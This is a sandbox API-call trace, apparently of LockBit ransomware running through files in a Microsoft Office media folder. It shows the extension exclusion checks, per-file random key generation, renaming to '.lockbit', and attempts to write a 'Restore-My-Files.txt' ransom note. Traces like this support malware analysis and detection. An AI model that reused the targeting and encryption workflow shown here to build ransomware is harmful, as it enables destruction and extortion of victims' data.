lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.210] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.210] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.210] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF.lockbit") returned 76 [0210.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115855.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0210.211] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.211] malloc (_Size=0x40068) returned 0x1ff1e60 [0210.211] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=282) returned 1 [0210.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0210.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0210.212] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0210.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.213] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.213] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.214] free (_Block=0x1fa2ed8) [0210.214] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.214] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.214] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d3ee00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x51d3ee00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115856.GIF", cAlternateFileName="")) returned 1 [0210.214] lstrcmpiW (lpString1=".", lpString2="J0115856.GIF") returned -1 [0210.214] lstrcmpiW (lpString1="..", lpString2="J0115856.GIF") returned -1 [0210.214] PathFindExtensionW (pszPath="J0115856.GIF") returned=".GIF" [0210.214] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.214] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.214] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.214] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.214] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.215] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.215] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.216] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115856.GIF") returned 1 [0210.216] lstrcmpiW (lpString1="ntldr", lpString2="J0115856.GIF") returned 1 [0210.216] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115856.GIF") returned 1 [0210.216] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115856.GIF") returned -1 [0210.216] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115856.GIF") returned -1 [0210.216] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115856.GIF") returned 1 [0210.216] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115856.GIF") returned -1 [0210.216] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.216] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF") returned=".GIF" [0210.216] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.216] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.217] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.217] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.217] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF.lockbit") returned 76 [0210.217] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115856.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0210.218] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.218] malloc (_Size=0x40068) returned 0x3d70450 [0210.218] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=282) returned 1 [0210.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0210.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0210.219] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0210.220] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.220] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.220] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.221] free (_Block=0x1fa2ed8) [0210.221] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115856.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.221] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.221] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60220a00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x60220a00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115875.GIF", cAlternateFileName="")) returned 1 [0210.221] lstrcmpiW (lpString1=".", lpString2="J0115875.GIF") returned -1 [0210.221] lstrcmpiW (lpString1="..", lpString2="J0115875.GIF") returned -1 [0210.221] PathFindExtensionW (pszPath="J0115875.GIF") returned=".GIF" [0210.221] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.221] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.221] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.221] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.221] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.222] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.222] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.223] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115875.GIF") returned 1 [0210.223] lstrcmpiW (lpString1="ntldr", lpString2="J0115875.GIF") returned 1 [0210.223] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115875.GIF") returned 1 [0210.223] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115875.GIF") returned -1 [0210.223] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115875.GIF") returned -1 [0210.223] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115875.GIF") returned 1 [0210.223] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115875.GIF") returned -1 [0210.223] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.223] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF") returned=".GIF" [0210.223] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.223] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.223] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.223] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.223] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.223] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.224] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.224] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.224] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF.lockbit") returned 76 [0210.224] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115875.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0210.225] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.225] malloc (_Size=0x40068) returned 0x3e70008 [0210.225] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=467) returned 1 [0210.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0210.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0210.226] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0210.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.227] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.227] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.243] free (_Block=0x1fa2ed8) [0210.243] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115875.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.243] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.243] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60220a00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x60220a00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115876.GIF", cAlternateFileName="")) returned 1 [0210.243] lstrcmpiW (lpString1=".", lpString2="J0115876.GIF") returned -1 [0210.243] lstrcmpiW (lpString1="..", lpString2="J0115876.GIF") returned -1 [0210.243] PathFindExtensionW (pszPath="J0115876.GIF") returned=".GIF" [0210.243] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.243] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.243] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.243] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.243] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.243] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 